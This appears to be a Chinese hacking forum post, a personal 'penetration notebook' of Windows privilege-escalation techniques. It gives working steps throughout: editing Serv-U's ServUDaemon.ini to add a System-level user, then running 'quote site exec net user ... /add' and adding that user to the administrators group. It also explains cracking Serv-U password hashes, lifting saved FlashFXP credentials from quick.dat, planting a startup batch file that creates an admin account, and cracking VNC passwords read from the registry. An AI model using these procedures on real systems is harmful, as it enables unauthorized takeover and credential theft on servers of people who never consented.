渗透笔记本(4)

【serv-u提权/serv -u提权/serv u提权/43958提权/43958端口提权】
serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
serv-u密码文件:ServUDaemon.ini
端口如果改了可以通过pid查看
或者可以到serv u的配置文件里面去找!
SerUDaemon.ini这个文件
lccalsetuportNo=端口


----------------------------------
--管理员修改了serv u 密码--------
----------------------------------
进入其安装目录找到serv u的ServUDaemon.ini这个文件(该文件时储存密码的),然后将密码丢到shell里面去,然后进行serv-u提权,不过一般管理员并不修改serv-u的密码

----------------------------------
----------无修改权限提权----------
----------------------------------
直接在大马自带的serv-u自带的那里提权,倘若失败,请尝试下列思路。

直接下载servuadmin.exe(在serv-u默认安装目录下)利用C32打开搜索其IP(或搜索port,LocalSetupPassword=,localadministrator),IP后面的第一个
为帐号,账号后的即为密码。(默认的账号为localadministrator)然后再到serv-u自带的提权窗口进行修改帐号
密码从而提权。

----------------------------------
------------修改权限提权----------
----------------------------------

进入其serv-u默认安装目录(小技巧:桌面找到他的安装快捷方式下载下来查看那),找到ServUDaemon.ini该文件,尝试是否可以修改,倘若可以,便可执行以下步骤,
反之即为无修改权限提权,添加一个user。然后添加以下内容;
[USER=fcz|1] //用户名
Password=202CB962AC59075B964B07152D234B70 //用户密码加密后的密文,密码为123
HomeDir=c:\ //默认根目录
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
注解:斜杠为理解之用,并非也要予以添加。

添加完成后即可开始邪恶计划,打开Dos
键入以下内容;
ftp 目标IP 然后回车然后输入你刚才新建的用户名即为fcz和密码123,然后执行以下命令;
quote site exec net user fuchouzhe 123 /add
quote site exec net localgroup administrators fuchouzhe /add

完工。
小知识;bye命令即为退出目标计算机。
如果管理员将serv u的密码给改了,可以到这里去查看查看密码,然后在大马哪里修改并进行serv u提权


以下源于互联网,害怕俺写的不够全面。
### Serv-U目录有修改提权:

ServU 密码加密存储方法
首先随机生成2位字符(从a-z小写字符).

再将用户原始密码与这2位随机字符合并成为新的密码字符.
如: 用户原始密码为a,随机生成字符为dx,则合并后新的密码字符串为:"dxa"
再使用新密码字符串进行MD5 Hash运算.
dxa=F2319AE3B312103BB3259CA8242DD16C
然后再存储到ini文件,存储方法为2位随机字符加上新密码字符的MD5 Hash值.
如下:
[USER=a|1]
Password=dxF2319AE3B312103BB3259CA8242DD16C


ServU 密码破解方法:

除去前2位随机字符获得F2319AE3B312103BB3259CA8242DD16C.
把该MD5 Hash值存入暴力破解工具,产生字典时注意前2位密码必定是dx.
F2319AE3B312103BB3259CA8242DD16C=dxa

提权思路:Serv-U 修改serv-u配置文件 添加超级管理员

步骤:
[USER=lx|1]
Password=uc8270A0A37BE006573C96DB29DF42DEE8
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP


用cmd登陆ftp,,然后在执行下列命令添加用户

quote site exec net user 用户 密码 /add 添加用户
quote site exec net localgroup administrators 用户 /add 添加到管理员组


C:\Program Files\RhinoSoft.com\Serv-U 默认端口43958 修改的文件ServUDaemon.ini (默认路径)


注意:添加失败的原因可能添加的用户名重名,试试其他组合的用户名,,User2=pp|1|0 (用户的顺序一定要设置好)
### 结束###


【flashfxp提权】
思路:下载flashfxp下的配置文件(quick.dat)覆盖到本地,然后星号查看器查看出密码,你懂啦~

falshfxp默认安装目录:C:\Program Files\flashfxp
在其安装目录中找到以下文件并予以下载
quick.dat
然后本机下载且安装flashfxp,将以上三个文件放置于本件安装安装flashfxp目录下,会提示已经有了是否覆盖
直接点击确定覆盖。然后再次打开flashfxp快速连接,在历史的那里就直接有目标机的地址了。帐号轻而易举的获
得(用星号查看器),如此便OK。可以尝试用ftp密码当作3389的密码登录试试!

【写入启动项提权/启动项里提权】

查看C:\Documents and Settings\All Users\「开始」菜单\
是否可读可写,倘若可写请输入以下代码。
@echo off
net user xieying fuchou /add
net localgroup administrators xieying /add

如此一来仅需等待服务器重启即可。可以用dos执行重启命令哟。或者D他,使其重启。

【VNC密码破解提权/vnc提权/5900端口开放/5900开放/5900入侵/】
思路:通过注册表读取出vnc十进制的密码,然后转化为十六进制,最后用vncx4.exe输入十六进制的密码破解,远程连接之!

默认安装目录:C:\Program Files\RealVNC\VNC4
直接进注册表(HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password)获取密码即可,如果说跟路劲无效什么的,那可能是权限不够,以文本形式打开以后
ctrl+f搜索password
读出来的密码是十进制 要转换为16进制,然后将十六进制的用vncx4.exe破解
使用方法如下;
dos下使用vncx4.exe执行命令vncx4.exe -W //W是大写的。(输入转换十六进制后的数值)
破解成功就直接用vnc直接连接呗。
以下非本人所笔,来源于互联网因(怕各位觉得俺写的不够全面)
### vnc远控提权:

这二个目录有关于vnc安装的信息,有此目录代表服务器安装了vnc
C:\Program Files\RealVNC\VNC4
C:\Documents and Settings\All Users\「开始」菜单\程序\RealVNC

Vnc开发的端口为5900 密码存放在注册表中 地址为
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password (vnc4密码在这个键值里)
HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber (vnc4的端口)

HKCU\Software\ORL\WinVNC3\Password (vnc3的密码)
HKCU\Software\ORL\WinVNC3\PortNumber (vnc3的端口)

1.找到vnc4.0版本的注册表键值,
2.然后转换成16进制
3.用vncx4破解
4.本地安装vnc
5.本地连接


密码的破解:
cmd切换到vnc4的目录,,
命令行录入:vncx4 -W
备注:此处参数W是大写
然后顺序录入上面的每一个十六进制数据,每录完一个回车一次就行了。

### 结束###
转载请注明本文链接: http://www.mayidui.net/t2295.html
游客
登录后才可以回帖,登录 或者 注册